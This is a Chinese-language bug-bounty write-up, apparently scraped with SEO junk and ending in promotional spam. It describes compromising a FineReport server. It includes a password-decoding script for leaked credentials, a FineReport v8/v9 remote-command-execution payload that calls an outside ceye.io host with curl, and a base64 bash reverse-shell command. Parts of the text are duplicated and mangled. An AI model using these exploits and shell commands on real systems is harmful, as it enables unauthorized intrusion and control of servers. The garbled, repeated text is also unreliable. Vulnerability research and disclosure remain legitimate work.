深圳团购网站设计哪家好,网络公司办公室图片,临沂在线上网站建设,网上在线看视频为什么卡本文仅供网络安全学习研究#xff0c;违F绕路 资产发现
首先是信息收集子域名#xff0c;谷歌语句直接site:xxx.com -www,一个登录口网站吸引了我的注意力。 我点击电信、网通、自动的时候#xff0c;发现域名跳转到了真实IP 这样#xff0c;就可以对真实IP进行端口扫描-违F绕路 资产发现
首先是信息收集子域名谷歌语句直接site:xxx.com -www,一个登录口网站吸引了我的注意力。 我点击电信、网通、自动的时候发现域名跳转到了真实IP 这样就可以对真实IP进行端口扫描-目录扫描一把梭了发现在8080端口发现ReportServe部署页面。 接着就对帆软的历史漏洞进行测试了。
任意文件读取获取密码解密登录后台
view-source:xxx.xxx.xxx.xxx:8080/ReportServe…
刚开始的时候是空白页查看源代码才发现信息 可以看到用户为posun,密码需要解密一下
解密脚本
cipher ___0022007c0039003b005100e3 #密文
PASSWORD_MASK_ARRAY [19, 78, 10, 15, 100, 213, 43, 23] #掩码
Password
cipher cipher[3:] #截断三位后
for i in range(int(len(cipher) / 4)):c1 int(0x cipher[i * 4:(i 1) * 4], 16)c2 c1 ^ PASSWORD_MASK_ARRAY[i % 8]Password Password chr(c2)
print (Password)
解密得到123456问题是拿到哪里登录呢突然想到刚才有个数据决策系统拿去登录刚才的数据决策系统. 成功进入后台然而高兴的太早了,因为该站长注册码到期了且没有什么敏感信息。SRC也是反馈危害性不大不能收没办法只能另寻途径了。 【相关技术学习文档】 帆软报表FineRePort未授权远程命令执行漏洞
影响版本: 帆软报表 FineRePortv8.0帆软报表 FineRePortv9.0
xxx.com/WebReport/ReportServer?opfr_logcmdfg_errinfofr_usernameadmin这个接口 打开 点查询 burp拦截数据包 替换post的内容__parameters__{LABEL1:TYPE:,TYPE:6;CREATE ALIAS RUMCMD FOR com.fr.chart.phantom.system.SystemServiceUtils.exeCmd;CALL RUMCMD(curl http://uki7s7.ceye.io);select msg, trace, sinfo, logtime from fr_errrecord where 11,LABEL3:START_TIME:,START_TIME:2020-08-11 00:00,LABEL5:END_TIME:,END_TIME:2020-08-11 16:41,LABEL7:LIMIT:,LIMIT:2}
便操作了一下,前提是需要得知用户名
漏洞地址xxx.xxx.xxx.xxx:8080/ReportServe… 点击查询抓包改包这里先是简单的ceye回显改包后一直forward 可以看到我的ceye收到回显说明该漏洞是存在的为了证明危害性我后面继续了反弹shell操作
bash -c {echo,base64编码}|{base64,-d}|{bash,-i}
VPS监听7777端口如图下 反弹shell成功 备注:刚开始对面审核SRC愣是死活复现不出来,手把手教学了,这里有几个问题注意下,查询不能太频繁 容易并发数满,需要等一段时间,我后面第二天并发数才清空.
总结
多观察细节,比如刚刚的真实IP就冒出来了遇到危害性不大漏洞不要慌,留着还能组合其它的漏洞.
给大家的福利
零基础入门
对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。 同时每个成长路线对应的板块都有配套的视频提供 因篇幅有限仅展示部分资料
朋友们如果有需要全套《网络安全入门进阶学习资源包》可以扫描下方二维码免费领取如遇扫码问题可以在评论区留言领取哦~ 网络安全面试题 绿盟护网行动 还有大家最喜欢的黑客技术 网络安全源码合集工具包 所有资料共282G朋友们如果有需要全套《网络安全入门黑客进阶学习资源包》可以扫描下方二维码免费领取如遇扫码问题可以在评论区留言领取哦~